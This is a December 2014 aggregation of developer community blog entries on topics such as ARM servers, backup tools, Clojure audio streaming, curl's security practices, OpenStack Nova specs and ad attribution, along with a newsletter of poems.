Recent blog entries

21 Dec 2014 ole   » (Journeyer)

Girl 0.8.0 ("Cinnamon Girl")

The GNOME Internet Radio Locator 0.8.0 ("Cinnamon Girl") release is dedicated to Christmas and the music of Neil Young.


21 Dec 2014 marnanel   » (Journeyer)

Write a story about the sum...

A primary school test asked me "write a story about the sum 6+4=10". I had no idea what it was asking me to do, so I made a guess and wrote "One day 6+4=10 went for a walk. Then it came back. The end."

This entry was originally posted at http://marnanel.dreamwidth.org/319582.html. Please comment there using OpenID.

Syndicated 2014-12-20 23:56:35 from Monument

20 Dec 2014 broonie   » (Journeyer)

Adventures with ARM server

I recently got a CubieTruck with a terabyte SSD to use as a general always-on server. This being an ARM board rather than a PC (with a rather nice form factor – it’s basically the same size as an SSD), you’d normally expect a blog post about it to include instructions for kernels and patches and so on, but with these systems and current Debian testing there’s no need – Debian works out of the box (including our standard kernel), the instructions worked easily, and I now have a new machine sitting quietly in the corner serving away. Sadly, being a dual core A7 it hasn't got the grunt to replace my kernel build test system: an ARM allmodconfig takes eleven and a bit hours, as opposed to a little less than twenty minutes on my desktop (which does draw well over an order of magnitude more power doing it). Otherwise, though, you’d never notice the difference when using the system.

The upshot of all this is that actually there’s no real adventure at all; for systems like these where the system vendors and the communities around them are doing the right things and working well with upstream things just work as you’d expect with minimal effort.

The one thing that’s noticeably different from installing on a PC, and that really could do with improving, is that the boot firmware has to be written to an SD card instead of being shipped as part of the board. That could be addressed as simply as shipping a suitably programmed SD card in the box, without any other modification of the hardware, though on-board flash would be even nicer.
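For the record, on Allwinner-based boards like this one the firmware write is typically a single dd of the U-Boot SPL image to an 8 KiB offset on the card. The device and file names below are placeholders, so check the installation instructions for your board before running anything like this:

```
# Write the U-Boot SPL image near the start of the SD card.
# /dev/sdX is a placeholder -- double-check which device is your card!
dd if=u-boot-sunxi-with-spl.bin of=/dev/sdX bs=1024 seek=8
sync
```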

Syndicated 2014-12-20 18:57:06 from Technicalities

19 Dec 2014 Stevey   » (Master)

Switched to using attic for backups

Even though seeing the word attic reminds me too much of leaking roofs and CVS, I've switched to using the attic backup tool.

I want a simple system which will take incremental backups, perform deduplication (to avoid taking too much space), support encryption, and be fast.

I stopped using backup2l because the .tar.gz files were too annoying, and it was too slow. I started using obnam because I respect Lars and his exceptionally thorough testing regime, but had to stop using it when things started getting "too slow".

I'll document the usage/installation in the future. For the moment the only annoyance is that it is contained in the Jessie archive, not the Wheezy one. Right now only 2/19 of my hosts are Jessie.
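Until that fuller write-up, the basic workflow looks roughly like this (the repository path, archive naming, and retention numbers here are examples, not a recommendation):

```
# One-off: create an encrypted repository (prompts for a passphrase)
attic init --encryption=passphrase /backup/repo.attic

# Daily: take an incremental, deduplicated archive of the chosen paths
attic create --stats /backup/repo.attic::$(date +%Y-%m-%d) /home /etc

# Occasionally: expire old archives according to a retention policy
attic prune /backup/repo.attic --keep-daily=7 --keep-weekly=4
```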

Syndicated 2014-12-19 13:51:55 from Steve Kemp's Blog

16 Dec 2014 marnanel   » (Journeyer)

Region mapper

Something I've wanted to do for a while: You know those sites where you can fill in which states/counties/whatever you've visited? I'd like to generalise that. You could zoom to a particular area and it would say "counties of Wales" or "police force areas of Wales" or "wards of Salford" or whatever. Then when you chose one you could colour the regions in as you wished, and make a key. And then you could save them as SVG or PNG, both with enough metadata that you could reload them back into the site and get your editable state back. Some sort of integration with Wikimedia Commons would be nice too. What do you think?

This entry was originally posted at http://marnanel.dreamwidth.org/319179.html. Please comment there using OpenID.

Syndicated 2014-12-16 21:37:55 from Monument

16 Dec 2014 rodrigo   » (Master)

GObservableCollection

In the last year working at Xamarin, I have learned lots of new things (.NET, Cocoa, …), and since the beginning I have been thinking of bringing some of that nice stuff to GNOME, but never really had the chance to finish anything. Fortunately, being free now (on vacation), I have finally finished the first thing: GObservableCollection, a thread-safe collection implementation which emits signals on changes.

It is based on ideas from .NET’s ObservableCollection and concurrent collections, which I’ve used successfully for building a multi-threaded data processing app (with one thread updating the collection and another consuming it), so I thought it would be a good addition to GLib’s API. This class can be used in single-threaded apps to easily get notifications for changes in a collection, and in multi-threaded ones to, as mentioned above, easily share data between different threads (as can be seen in the simple test I wrote).

This is the first working version, so it will surely need improvements, but instead of keeping it private for a few more months, I thought it would be better to get some feedback before I submit it as a patch for GLib’s GIO (if that’s the best place for it, which I guess it is).
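To make the idea concrete, here is a rough sketch of how such a collection might be consumed from C. Everything below (the signal name, the callback signature) is guessed from the description above and from .NET's ObservableCollection, not taken from the actual API:

```c
#include <glib-object.h>

/* Hypothetical callback: fired whenever an item is added to the
 * collection, possibly from another thread.  Signal name and
 * signature are invented for illustration. */
static void
on_item_added (gpointer collection, guint position,
               gpointer item, gpointer user_data)
{
  g_print ("item added at position %u\n", position);
}

static void
watch_collection (gpointer collection)
{
  /* "item-added" is an illustrative signal name, not the real one */
  g_signal_connect (collection, "item-added",
                    G_CALLBACK (on_item_added), NULL);
}
```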

Syndicated 2014-12-16 19:25:24 from Rodrigo Moya

16 Dec 2014 dan   » (Master)

core.async with aleph

(More sledge retrospective)

There was a point about three weeks ago when I thought I had a working audio player; then I tried using it on the phone and got awkward screeches every thirty seconds through my stereo when I told it to play Ziggy Stardust. No, I’m not talking about David Bowie’s voice here: this was genuine “a dog ate my CD” style digital audio corruption. The problem seemed to appear only on Wifi: I could replicate it on my laptop, but it didn’t show up on localhost and it didn’t show up over an ssh tunnel. I suspect it was something related to buffering/backpressure, and facing the prospect of debugging Java code with locks in it I punted and decided to try switching HTTP server instead.

Documentation on HTTP streaming from core.async channels with Aleph is kind of sparse, at least insofar as it is lacking a simple example of the kind of thing that should work. So here is my simple example of the kind of thing that worked for me: wrap the channel in a call to manifold.stream/->source and make sure that the things received on it are byte-arrays:

(defn transcode-handler [request pathname]
  {:status 200
   :headers {"content-type" "audio/ogg"
             "x-hello" "goodbye"}
   :body (manifold/->source (transcode-chan pathname))})

(from server.clj )

I’m sure there are other things you could put on the channel that would also work, but I don’t know what. java.nio.ByteBuffer doesn’t seem to be one of them, but I’m only going on git commit history and a very fuzzy recollection of what I was doing that day, it might be that I did something else wrong.

Syndicated 2014-12-16 07:34:29 from diary at Telent Netowrks

16 Dec 2014 marnanel   » (Journeyer)

marnanel @ 2014-12-16T01:59:00

Gentle Readers
a newsletter made for sharing
volume 2, number 7
15th December 2014: the strangest whim
What I’ve been up to

I've been dividing my time between writing, contacting potential literary agents, and being asleep-- this last because they're trying me with a new antidepressant. So far it seems to be going well, but time will tell.

Two special offers for your attention, especially if you're looking for last-minute ideas for presents:

1) Because my partner Kit and I are still both too ill to work, I've reissued Time Blew Away Like Dandelion Seed, a collection of over a hundred of my poems. You can buy the paperback from Lulu. A signed and numbered hardback edition is also in the works: I'll let you know when it's ready. (The best regular way of supporting Gentle Readers, and me, financially is still through Patreon.)

2) My good friend Katie, who is a talented photographer as well as a nursing student, was due to study in the Netherlands next semester, but then she was unexpectedly sent to Finland instead. The Finnish cost of living is rather greater than the Dutch, so she is selling prints of her work to make up the budget shortfall. Please do go and check them out.

A poem of mine

FOR NIGHT CAN ONLY HIDE

When once I stop and take account of these
that God has granted me upon the earth,
the loves, the friends, the work, that charm and please
these things I count inestimable worth;
when once I stop, I learn that I am rich
beyond the dreams of emperors and kings
and light is real, and real these riches which
exceed the worth of all material things...
   when thus I stop, I cannot understand
   when few and feeble sunbeams cannot find
   their way into that drab and dreary land,
   the darkness of the middle of my mind.
yet darkness cannot take away my joy,
for night can only hide, and not destroy.

Something wonderful

The City of Westminster is one of the towns that make up Greater London. In 1672, its population was growing very fast, and builders were anxious to buy land for housing. George Villiers, the Duke of Buckingham, owned a mansion in Westminster called York House, and he agreed to sell it for demolition and redevelopment. The price he named was £30,000-- around £6 million in modern money-- plus one extra condition: all the streets built on the land had to be named after him.

The developers agreed, and set to work. Soon they had built George Street, Villiers Street, Duke Street, and Buckingham Street, at which point they were running out of naming possibilities, with one small alley yet to be named. Thus, in a moment of desperate lateral thinking, they gave it the ingenious name of Of Alley.

Something from someone else

Chesterton wrote quite a few poems about depression. I like this one particularly because it starts humorously-- literally using gallows humour-- but once it's drawn you in, it ends on a serious point about hope. Ballades are a difficult form, but Chesterton makes it look easy, though in fact he's made it even harder for himself by his choice of rhymes. It's conventional to address a prince at the end of a ballade, who is often assumed to be the Prince of Darkness (i.e. Satan): thus the end of the poem is about the downfall of evil, and perhaps the Second Coming.

BALLADE OF SUICIDE
by G K Chesterton

The gallows in my garden, people say,
Is new and neat and adequately tall.
I tie the noose on in a knowing way
As one that knots his necktie for a ball;
But just as all the neighbours— on the wall—
Are drawing a long breath to shout "Hurray!"
The strangest whim has seized me... After all
I think I will not hang myself today.

To-morrow is the time I get my pay—
My uncle's sword is hanging in the hall—
I see a little cloud all pink and gray—
Perhaps the rector's mother will NOT call—
I fancy that I heard from Mr. Gall
That mushrooms could be cooked another way—
I never read the works of Juvenal—
I think I will not hang myself today.

The world will have another washing day;
The decadents decay; the pedants pall;
And H. G. Wells has found that children play,
And Bernard Shaw discovered that they squall;
Rationalists are growing rational—
And through thick woods one finds a stream astray,
So secret that the very sky seems small—
I think I will not hang myself today.

Prince, I can hear the trumpet of Germinal,
The tumbrils toiling up the terrible way;
Even today your royal head may fall—
I think I will not hang myself today. 

Colophon

Gentle Readers is published on Mondays and Thursdays, and I want you to share it. The archives are at https://gentlereaders.uk, and so is a form to get on the mailing list. If you have anything to say or reply, or you want to be added or removed from the mailing list, I’m at thomas@thurman.org.uk and I’d love to hear from you. The newsletter is reader-supported; please pledge something if you can afford to, and please don't if you can't. ISSN 2057-052X. Love and peace to you all.

This entry was originally posted at http://marnanel.dreamwidth.org/318874.html. Please comment there using OpenID.

Syndicated 2014-12-16 04:17:50 (Updated 2014-12-16 04:20:09) from Monument

15 Dec 2014 bagder   » (Master)

Can curl avoid being in a future funnily named exploit that shakes the world?

During this year we’ve seen heartbleed and shellshock strike (and a few more big flaws that I’ll skip for now). Two really eye-opening recent vulnerabilities in projects with many similarities:

  1. Popular corner stones of open source stacks and internet servers
  2. Mostly run and maintained by volunteers
  3. Mature projects that have been around since “forever”
  4. Projects believed to be fairly stable and relatively trustworthy by now
  5. A myriad of features, switches and code that build on many platforms, with some parts of code only running on a rare few
  6. Written in C in a portable style

Does it sound like the curl project to you too? It does to me. Sure, this description also matches a slew of other projects but I lead the curl development so let me stay here and focus on this project.

Are we in jeopardy? I honestly don’t know, but I want to explain what we do in our project in order to minimize the risk and maximize our ability to find problems on our own before they become serious attack vectors somewhere!

previous flaws

It’s no secret that we have let security problems slip through at times. We’re right now working toward our 143rd release, in roughly 16 years of life-time. We have found and announced 28 security problems over the years. Looking at those problems, it is clear that very few of them are discovered quickly after introduction; most linger for several years until found and fixed. So, realistically speaking, based on history: there are security bugs still in the code, and they have probably been present for a while already.

code reviews and code standards

We try to review all patches from people without push rights in the project. It would probably be a good idea to review all patches before they go in for real, but that just wouldn’t work with the (lack of) manpower we have in the project while we at the same time want to develop curl, move it forward and introduce new things and features.

We maintain code standards and formatting to keep code easy to understand and follow. We keep individual commits smallish for easier review now or in the future.

test cases

As simple as it is, we test that the basic stuff works. We don’t and can’t test everything, but having test cases for most things gives us the confidence to change code when we see problems, as we then remain fairly sure things keep working the same way as long as the tests pass. In projects with much less test coverage you become much more conservative about what you dare to change, and that also makes you more vulnerable.

We always want more test cases. We want to keep adding test cases whenever we add new features, and ideally we should also add test cases when we fix bugs, so that we know we won’t introduce the same bug again in the future.

static code analysis

We regularly scan our code base using static code analyzers. Both clang-analyzer and coverity are good tools, and they help us by pointing out code that looks wrong or suspicious. By making sure we have very few or no such flaws left in the code, we minimize the risk. A static code analyzer is better than run-time tools for cases where it can check code flows that are hard to repeat in my local environment.

valgrind

Valgrind is an awesome tool to detect memory problems in run-time: leaks, or just stupid uses of memory or related functions. Our test suite automatically uses valgrind when running tests if it is present, and it helps us make sure that all situations we test for are also error-free from valgrind’s point of view.

autobuilds

Building and testing curl on a plethora of platforms non-stop is also useful to make sure we don’t depend on behaviors of particular library implementations, non-standard features and more. Testing it all is basically the only way to make sure everything keeps working over the years while we continue to develop and fix bugs. We would of course be even better off with more platforms that test automatically, and with more developers keeping an eye on problems that show up there…

code complexity

Arguably, one of the best ways to avoid security flaws, and bugs in general, is to keep the source code as simple as possible. Complex functions need to be broken down into smaller functions that are possible to read and understand. A good tool for identifying functions that need such attention is pmccabe.
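For example (the paths here are illustrative), pmccabe's per-function complexity numbers can be sorted to put the best candidates for splitting up at the top:

```
# Rank functions by cyclomatic complexity, highest first; the worst
# offenders at the top are the best candidates for breaking down.
pmccabe src/*.c lib/*.c | sort -nr | head -20
```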

essential third parties

curl and libcurl are usually built to use a whole bunch of third party libraries in order to provide all their functionality. In order for none of those uses to turn into a source of trouble, we must of course also participate in those projects, help them stay strong, and make sure that we use them properly, in ways that don’t lead to any bad side-effects.

You can help!

All this takes time, energy and system resources. Your contributions and help will be appreciated in any of these tasks where you can pitch in. We could do all of this more often and more thoroughly if only we were more people involved!

Syndicated 2014-12-15 22:21:07 from daniel.haxx.se

15 Dec 2014 badvogato   » (Master)

It's Monday. Guess y'all know that already. A debt of $10,176.00 from the labor dept. of New Jersey was piled on my desk, and none of the websites on its letter work...
For more information visit: http://lwd.dol.state.nj.us/labor/ui/content/overpayment.html NOT FOUND.

OR ELECTRONIC PAYMENT MAY BE MADE AT
https://www1.state.nj.us/TYTR_LBR_Claims/jsp/Login.jsp
'Site is taking too long ...'

go Christie go for 2016 US OF A.!

mesg sent to MDC to check out gobank. also submit my resume to Oracle@Trenton, fondly recall Oracle acct manager was telling the audience about his ex-job, 'In the business world, the customer is your King. But on my last job, guess what? Our customer is more or less wrong to fall into your hands in the first place...' Good humor had for all at the time...no more ?

15 Dec 2014 dan   » (Master)

Using the HTML5 audio element in Om

A quick one: if you want to render the HTML5 audio element with Om and do stuff with the events it raises, you will find that the obvious answer is not the right one. Specifically, this doesn’t work

(dom/audio #js {:controls true
                :autoPlay true
                :ref "player"
                :src bits
                :onEnded #(do-something)})

This might be because React has to be taught about each event that each element can trigger and it doesn’t know about this one, or it might be because (it is alleged that) event handling in React is done by placing a single event handler on the top-level component and then expecting events on subelements to bubble up. According to Stack Overflow, audio events don’t bubble.

The workaround is to add the event listener explicitly in IDidMount, and to call addEventListener with its third parameter true, meaning that the event is captured by the parent before it even gets to the sub-element to be swallowed. Like this:
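A sketch of that workaround in Om (the component shape and handler names here are reconstructed from the description above, so treat them as illustrative):

```clojure
(defn audio-widget [bits owner]
  (reify
    om/IDidMount
    (did-mount [_]
      ;; attach in the capture phase (third argument true) so the
      ;; "ended" event is seen even though it doesn't bubble
      (.addEventListener (om/get-node owner "player")
                         "ended"
                         (fn [e] (do-something))
                         true))
    om/IRender
    (render [_]
      (dom/audio #js {:controls true
                      :autoPlay true
                      :ref "player"
                      :src bits}))))
```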

Syndicated 2014-12-15 00:07:51 from diary at Telent Netowrks

15 Dec 2014 dan   » (Master)

clj-webdriver with recent Clojure/Firefox

At the time I write this, the latest release of clj-webdriver is 0.6.1. There are two separate problems with this version, at least as far as I can make out

1) Some kind of bug which causes it to fail with the message No such var: clojure.core.cache/through. I haven’t tracked this to its root cause, but I'm guessing that the [org.clojure/core.cache "0.5.0"] in clj-webdriver’s project.clj was too old a version for some other dependency I am pulling in. I added an explicit [org.clojure/core.cache "0.6.4"] in my project and that seems to have fixed it. See clj-webdriver issue 132.

2) The version of Selenium it pulls in is 2.39, which is too old to work properly with even the vaguely recent version of Firefox I’m using (33.1.1). Fixing this is again just a matter of adding the more recent versions of Selenium stuffz as explicit dependencies in project.clj.
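Concretely, the :dependencies vector ends up looking something like this (the Selenium version numbers below are illustrative; use whatever recent releases match your Firefox):

```clojure
:dependencies [[clj-webdriver "0.6.1"]
               ;; override clj-webdriver's too-old transitive dependency
               [org.clojure/core.cache "0.6.4"]
               ;; newer Selenium than the 2.39 that clj-webdriver pulls in
               [org.seleniumhq.selenium/selenium-java "2.44.0"]
               [org.seleniumhq.selenium/selenium-server "2.44.0"]]
```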

With those two changes clj-webdriver now seems pretty happy, and I can start adding some basic smoke tests to Sledge so that I don’t have to manually test client-side behaviours whenever I change it.

Done: use reference cursors instead of channels for enqueuing/dequeing tracks

Next up: use a channel for xhr search instead of quite so many callbacks

Forthcoming: more work on UI/UX. Add tabs to switch between search view and play queue, unify the different-for-no-good-reason “search” and “filters”.

The branch/commit policy from hereon in is

  • it is a bug if master doesn’t pass regression tests on my machine
  • but there could be any kind of rubbish on branches
  • but I firmly subscribe to the Kanban notion of limiting work-in-progress, so will be striving to keep each of these branches short-lived or to declare them moribund at the earliest opportunity

Note that the tests currently depend on having a music collection containing at least four tracks by Queen. This is not ideal and I will fix it some day but in the meantime you’ll just have to work around it somehow. Maybe try leaving a USB stick in the car for two weeks or something

Syndicated 2014-12-14 23:06:29 from diary at Telent Netowrks

15 Dec 2014 mikal   » (Journeyer)

Ghost

ISBN: 9781416520870
LibraryThing
Trigger warning, I suppose.

This is like a Tom Clancy book, but with weirder sex, much of it non-consensual. It's also not as well thought through, as well researched, or as believable. I couldn't bring myself to finish it.

Tags for this post: book john_ringo terrorism nuclear
Related posts: Citadel; Hell's Faire; Princess of Wands; East of the Sun, West of the Moon; Watch on the Rhine; Cally's War


Comment

Syndicated 2014-12-14 15:48:00 from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

14 Dec 2014 mikal   » (Journeyer)

How are we going with Nova Kilo specs after our review day?

Time for another summary I think, because announcing the review day seems to have caused a rush of new specs to be filed (which wasn't really my intention, but hey). We did approve a fair few specs on the review day, so I think overall it was a success. Here's an updated summary of the state of play:



API



API (EC2)

  • Expand support for volume filtering in the EC2 API: review 104450.
  • Implement tags for volumes and snapshots with the EC2 API: review 126553 (fast tracked, approved).


Administrative

  • Actively hunt for orphan instances and remove them: review 137996 (abandoned); review 138627.
  • Check that a service isn't running before deleting it: review 131633.
  • Enable the nova metadata cache to be a shared resource to improve the hit rate: review 126705 (abandoned).
  • Implement a daemon version of rootwrap: review 105404.
  • Log request id mappings: review 132819 (fast tracked).
  • Monitor the health of hypervisor hosts: review 137768.
  • Remove the assumption that there is a single endpoint for services that nova talks to: review 132623.


Block Storage

  • Allow direct access to LVM volumes if supported by Cinder: review 127318.
  • Cache data from volumes on local disk: review 138292 (abandoned); review 138619.
  • Enhance iSCSI volume multipath support: review 134299.
  • Failover to alternative iSCSI portals on login failure: review 137468.
  • Give additional info in BDM when source type is "blank": review 140133.
  • Implement support for a DRBD driver for Cinder block device access: review 134153.
  • Refactor ISCSIDriver to support other iSCSI transports besides TCP: review 130721 (approved).
  • StorPool volume attachment support: review 115716.
  • Support Cinder Volume Multi-attach: review 139580 (approved).
  • Support iSCSI live migration for different iSCSI target: review 132323 (approved).


Cells



Containers Service



Database



Hypervisor: Docker



Hypervisor: FreeBSD

  • Implement support for FreeBSD networking in nova-network: review 127827.


Hypervisor: Hyper-V



Hypervisor: Ironic



Hypervisor: VMWare

  • Add ephemeral disk support to the VMware driver: review 126527 (fast tracked, approved).
  • Add support for the HTML5 console: review 127283.
  • Allow Nova to access a VMWare image store over NFS: review 126866.
  • Enable administrators and tenants to take advantage of backend storage policies: review 126547 (fast tracked, approved).
  • Enable the mapping of raw cinder devices to instances: review 128697.
  • Implement vSAN support: review 128600 (fast tracked, approved).
  • Support multiple disks inside a single OVA file: review 128691.
  • Support the OVA image format: review 127054 (fast tracked, approved).


Hypervisor: libvirt



Instance features



Internal

  • A lock-free quota implementation: review 135296.
  • Automate the documentation of the virtual machine state transition graph: review 94835.
  • Fake Libvirt driver for simulating HW testing: review 139927 (abandoned).
  • Flatten Aggregate Metadata in the DB: review 134573 (abandoned).
  • Flatten Instance Metadata in the DB: review 134945 (abandoned).
  • Implement a new code coverage API extension: review 130855.
  • Move flavor data out of the system_metadata table in the SQL database: review 126620 (approved).
  • Move to polling for cinder operations: review 135367.
  • PCI test cases for third party CI: review 141270.
  • Transition Nova to using the Glance v2 API: review 84887.
  • Transition to using glanceclient instead of our own home grown wrapper: review 133485 (approved).


Internationalization

  • Enable lazy translations of strings: review 126717 (fast tracked).


Networking



Performance

  • Dynamically alter the interval nova polls components at based on load and expected time for an operation to complete: review 122705.


Scheduler

  • A nested quota driver API: review 129420.
  • Add a filter to take into account hypervisor type and version when scheduling: review 137714.
  • Add an IOPS weigher: review 127123 (approved, implemented); review 132614.
  • Add instance count on the hypervisor as a weight: review 127871 (abandoned).
  • Allow extra spec to match all values in a list by adding the ALL-IN operator: review 138698 (fast tracked, approved).
  • Allow limiting the flavors that can be scheduled on certain host aggregates: review 122530 (abandoned).
  • Allow the remove of servers from server groups: review 136487.
  • Convert get_available_resources to use an object instead of dict: review 133728 (abandoned).
  • Convert the resource tracker to objects: review 128964 (fast tracked, approved).
  • Create an object model to represent a request to boot an instance: review 127610 (approved).
  • Decouple services and compute nodes in the SQL database: review 126895 (approved).
  • Enable adding new scheduler hints to already booted instances: review 134746.
  • Fix the race conditions when migration with server-group: review 135527 (abandoned).
  • Implement resource objects in the resource tracker: review 127609.
  • Improve the ComputeCapabilities filter: review 133534.
  • Isolate Scheduler DB for Filters: review 138444.
  • Isolate the scheduler's use of the Nova SQL database: review 89893.
  • Let schedulers reuse filter and weigher objects: review 134506 (abandoned).
  • Move select_destinations() to using a request object: review 127612 (approved).
  • Persist scheduler hints: review 88983.
  • Refactor allocate_for_instance: review 141129.
  • Stop direct lookup for host aggregates in the Nova database: review 132065 (abandoned).
  • Stop direct lookup for instance groups in the Nova database: review 131553 (abandoned).
  • Support scheduling based on more image properties: review 138937.
  • Trusted computing support: review 133106.


Scheduling



Security

  • Make key manager interface interoperable with Barbican: review 140144 (fast tracked, approved).
  • Provide a reference implementation for console proxies that uses TLS: review 126958 (fast tracked, approved).
  • Strongly validate the tenant and user for quota consuming requests with keystone: review 92507.


Service Groups



Scheduler

  • Add soft affinity support for server group: review 140017 (approved).


Tags for this post: openstack kilo blueprint spec nova
Related posts: Specs for Kilo; One week of Nova Kilo specifications; Compute Kilo specs are open; Specs for Kilo; Juno nova mid-cycle meetup summary: slots; Juno nova mid-cycle meetup summary: nova-network to Neutron migration

Comment

Syndicated 2014-12-14 15:07:00 (Updated 2014-12-15 00:08:30) from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

14 Dec 2014 mikal   » (Journeyer)

Soft deleting instances and the reclaim_instance_interval in Nova

I got asked the other day how the reclaim_instance_interval in Nova works, so I thought I'd write it up here in case it's useful to other people.

First off, there is a periodic task run by the nova-compute process (or the compute manager, as a developer would know it), which runs every reclaim_instance_interval seconds. It looks for instances in the SOFT_DELETED state which don't have any tasks running at the moment, on the hypervisor node that nova-compute is running on.

For each instance it finds, it checks if the instance has been soft deleted for at least reclaim_instance_interval seconds. From my reading of the code, this has the side effect that an instance needs to be deleted for at least reclaim_instance_interval seconds before it will be removed from disk, but the instance might be up to approximately twice that age (if it was deleted just as the periodic task ran, it would skip the next run and therefore not be deleted for two intervals).

Once these conditions are met, the instance is deleted from disk.
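The timing logic above is easy to get wrong, so here's a minimal sketch of the age check; the function and variable names are mine, not Nova's:

```python
import datetime


def old_enough_to_reclaim(deleted_at, now, reclaim_instance_interval):
    """Return True if a soft-deleted instance may be purged from disk.

    deleted_at and now are datetimes; reclaim_instance_interval is in
    seconds, mirroring the Nova config option of the same name.
    """
    age = (now - deleted_at).total_seconds()
    return age >= reclaim_instance_interval
```

Because the periodic task itself only fires every reclaim_instance_interval seconds, the actual delay before removal lands anywhere between one and two intervals, as described above.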

Tags for this post: openstack nova instance delete
Related posts: Juno nova mid-cycle meetup summary: nova-network to Neutron migration; Juno Nova PTL Candidacy; Juno nova mid-cycle meetup summary: scheduler; Juno nova mid-cycle meetup summary: ironic; Review priorities as we approach juno-3; Thoughts from the PTL

Comment

Syndicated 2014-12-14 13:51:00 from stillhq.com : Mikal, a geek from Canberra living in Silicon Valley (no blather posts)

14 Dec 2014 marnanel   » (Journeyer)

major rode ahead

I can remember going through that stage fairly clearly. I was about five, and I'd read a cracker joke at a party that said:
Knock knock.
Who's there?
Major.
Major who?
Major road ahead.
This is because there used to be road signs that said "major road ahead", but I didn't know this-- they'd been obsolete before I was born. I assumed it meant that a major in the army rode ahead of the rest of the soldiers. That seemed a bit odd, but when I told my parents the joke, they laughed. Can anything compare to that moment when you make someone else laugh on purpose? So I told the joke again the next day, and it somehow wasn't funny any more. Clearly, then, I had to learn new jokes, but how? I determined to experiment by changing the joke slowly to see whether I could work out what made the original joke funny. My first attempt was:
Knock knock.
Who's there?
Major.
Major who?
Major curtains.
Of course when I told my parents that joke they laughed as well because of the surrealism, which made constructing a hypothesis about the nature of humour rather difficult.

This entry was originally posted at http://marnanel.dreamwidth.org/318668.html. Please comment there using OpenID.

Syndicated 2014-12-14 13:29:19 from Monument

13 Dec 2014 hacker   » (Master)

HOWTO: Quick 7-Zip Trick to Encrypt Your Files with Non-Interactive Mode

I have a lot of data that I archive away on a regular basis, both on my “PC” machines and my mobile devices OTA. I needed a secure, reproducible way to secure those data with a very strong, complex password using extremely tight compression. Unfortunately, p7zip on Linux and 7-Zip for Windows don’t permit a […]

Related posts:
  1. HOWTO: How to Fix a Forgotten Windows Administrator or User Password with Sticky Keys I pulled some of my very old Windows VMs out...
  2. Using fdupes to Solve the Data Duplication Problem: I’ve got some dupes! Well, 11.6 hours later after scanning the NAS with fdupes,...
  3. HOWTO: Configure XChat Azure on OS X to connect to Freenode using SASL + Tor With all the recent news about the NSA, Prism Surveillance...

Syndicated 2014-12-13 20:59:55 from random neuron misfires

13 Dec 2014 dmarti   » (Master)

Look who's beating the advertising business at the BS game.

I read Bob Hoffman's blog, and, fine, I have to agree that advertising has a certain amount of bullshit in it. But the sad news is that old-fashioned brand bullshit is losing out to web-scale Big Data bullshit. Seriously, ad people, you're getting beat by a bunch of computer programmers. That's weak. Our idea of bullshitting is stuff like Look at the ROI to the company if you buy me a faster computer! We're just tech people, no formal training in any of this stuff. We shouldn't be able to out-bullshit anybody. But I guess that as soon as you throw TECHNOLOGY and STATISTICS into the mix, ad people are all, whatever you say!

Bwah ha ha.

How about a simple example of the kind of thing that gets through?

I'll start a used car lot, and hire a statistician. She stands around with a clipboard and watches the people who walk in. 20% of the people kick at least one tire. Out of the tire-kickers, 10% end up buying a car. Out of the rest of the people, only 1% end up buying a car. So, out of every 1000 visitors:

20: kick a tire and buy a car.

180: kick a tire and don't buy a car.

8: don't kick a tire, buy a car anyway.

792: neither kick a tire nor buy a car.

What do I do with this information besides sell 28 cars? Maybe, not much. But let's say I need to hire my nephew. So he comes in to work and starts handing a live rat to everyone who kicks a tire. Now, half of the people who get a rat just run away.

100: kick a tire, get a rat, run away.

10: kick a tire, get a rat, buy a car.

90: kick a tire, get a rat, don't run away but don't buy a car.

8: don't kick a tire, buy a car anyway.

792: neither kick a tire nor buy a car.

Now, are the rats a good idea? If you want to go by common sense, probably not. I'm selling 18 cars instead of 28. But let's say the nephew and the statistician work together to justify the rats. The statistician can do multi-touch attribution on car sales. How does that work?

Simply speaking, channels that appear more often in converting paths than in non-converting paths receive a higher weight, which in turn allows them to claim more conversion credits and thus revenue.

By multi-touch attribution, the rat plan is a huge win. There are 18 converting paths and there's a rat on 10 of them.
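The arithmetic behind the rat plan's "win" fits in a few lines (numbers from the example above, using 792 for the last group so the groups total 1000; the variable names are mine):

```python
# Outcomes per 1000 visitors under the rat policy.
converting_with_rat = 10          # kicked a tire, got a rat, bought a car
converting_without_rat = 8        # no tire kick, bought a car anyway
non_converting_with_rat = 100 + 90   # got a rat and ran away, or stayed and didn't buy
non_converting_without_rat = 792     # neither kicked a tire nor bought a car

converting = converting_with_rat + converting_without_rat              # 18 paths
non_converting = non_converting_with_rat + non_converting_without_rat  # 982 paths

# The rat "touch" shows up far more often on converting paths than on
# non-converting ones, so a naive attribution model gives it a high weight.
rat_rate_converting = converting_with_rat / converting          # ~0.56
rat_rate_non_converting = non_converting_with_rat / non_converting  # ~0.19
```

By that measure the rats look like a winning "channel", even though total sales dropped from 28 to 18.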

So, did I convince you that we should be handing out rats to more customers? Probably not. But use real-world messy data, dress it up with a few more graphs and some more mathematical-sounding language, and make the rats digital? Hell yeah.

Syndicated 2014-12-13 15:29:11 from Don Marti

13 Dec 2014 shlomif   » (Master)

Tech Tip: Make Jamendo Playback Work in Firefox on Mageia Linux

If you’re having a problem playing Jamendo tracks after pressing the “Listen” button (such as on this page) on Firefox running on Linux, then try to install the packages «gstreamer0.10-plugins-bad gstreamer0.10-plugins-good gstreamer0.10-plugins-ugly gstreamer0.10-mpeg gstreamer0.10-ffmpeg» (relevant to Mageia; try their equivalent in other distributions), restart Firefox and try again. The problem is that Firefox needs extra gstreamer plugins to play proprietary formats in HTML audio and video elements. Cheers!

Licence

You can reuse this entry under the Creative Commons Attribution 3.0 Unported licence, or at your option any later version. See the instructions on how to comply with it.

Syndicated 2014-12-13 12:15:09 from shlomif

12 Dec 2014 dkg   » (Master)

a10n for l10n

The abbreviated title above means "Appreciation for Localization" :)

I wanted to say a word of thanks for the awesome work done by debian localization teams. I speak English, and my other language skills are weak. I'm lucky: most software I use is written by default in a language that I can already understand.

The debian localization teams do great work in making sure that packages in debian get translated into many other languages, so that many more people around the world can take advantage of free software.

I was reminded of this work recently (again) with the great patches submitted to GnuPG and related packages. The changes were made by many different people, and coordinated with the debian GnuPG packaging team by David Prévot.

This work doesn't just help debian and its users. These localizations make their way back upstream to the original projects, which in turn are available to many other people.

If you use debian, and you speak a language other than english, and you want to give back to the community, please consider joining one of the localization teams. They are a great way to help out our project's top priorities: our users and free software.

Thank you to all the localizers!

